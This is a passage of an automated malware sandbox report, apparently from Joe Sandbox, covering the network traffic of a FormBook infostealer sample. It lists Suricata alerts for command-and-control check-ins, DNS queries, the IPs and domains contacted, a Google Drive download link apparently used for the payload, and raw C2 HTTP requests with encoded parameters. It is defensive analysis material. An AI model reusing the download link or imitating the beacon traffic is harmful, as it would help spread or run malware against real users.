        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49824 -> 193.108.130.23:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 193.108.130.23:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49812 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49828 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49776 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49820 -> 172.66.44.73:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49832 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49826 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49829 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49800 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49796 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49784 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49816 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 172.66.44.73:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49825 -> 74.208.236.225:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49827 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49804 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49822 -> 193.108.130.23:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49830 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49833 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49808 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49834 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49835 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49823 -> 193.108.130.23:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49831 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 172.66.44.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 13.248.169.48:80
        Source: DNS query: www.stayvact.xyz
        Source: DNS query: www.99b6q.xyz
        Source: DNS query: www.99b6q.xyz
        Source: DNS query: www.99b6q.xyz
        Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
        Source: Joe Sandbox ViewIP Address: 31.217.192.158 31.217.192.158
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: DIALTELECOMRO DIALTELECOMRO
        Source: Joe Sandbox ViewASN Name: EQUINIX-CONNECT-EMEAGB EQUINIX-CONNECT-EMEAGB
        Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49730 -> 142.251.40.174:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.eagleup.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.strategyvanguard.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.philippatston.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.stayvact.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.sleephygienist.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.xn--fhq1c541j0zr.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.jennarauten.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.taketechai.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.297tamatest1kb.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /qrln/?PbG=g/3tkO+pfBzB25V2Fctu5FsR83L3yxpv2AjDY8JJQQvDhQWyNNgQJTDimODyfvCkj1kKdo2+K9Uv71CRdCP6v9xe1ERDIsip1ir5cWHLWL+Z9Uyq0+QdRb0=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.ytfunnels.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /qlei/?PbG=1dhh/rR2+Ao8cSiudW9CEG89SOA5iCCmNAl/rU9Fzwpz0XQlGI+SqOP59XCH8flBSUq99zsbRoSQkEbtVQJkQy88E/1gHIIJW2hLrfVypywFJgwBZQbuFEw=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.hedieplastic.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.gipsytroya.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.eagleup.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.strategyvanguard.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.philippatston.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.stayvact.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.sleephygienist.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.xn--fhq1c541j0zr.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.jennarauten.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.taketechai.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.297tamatest1kb.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /71zx/?aPfP=cNoDEx_hrvchZzh&PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus= HTTP/1.1Host: www.eagleup.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.eagleup.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.strategyvanguard.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.philippatston.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.stayvact.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.sleephygienist.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.xn--fhq1c541j0zr.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.jennarauten.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
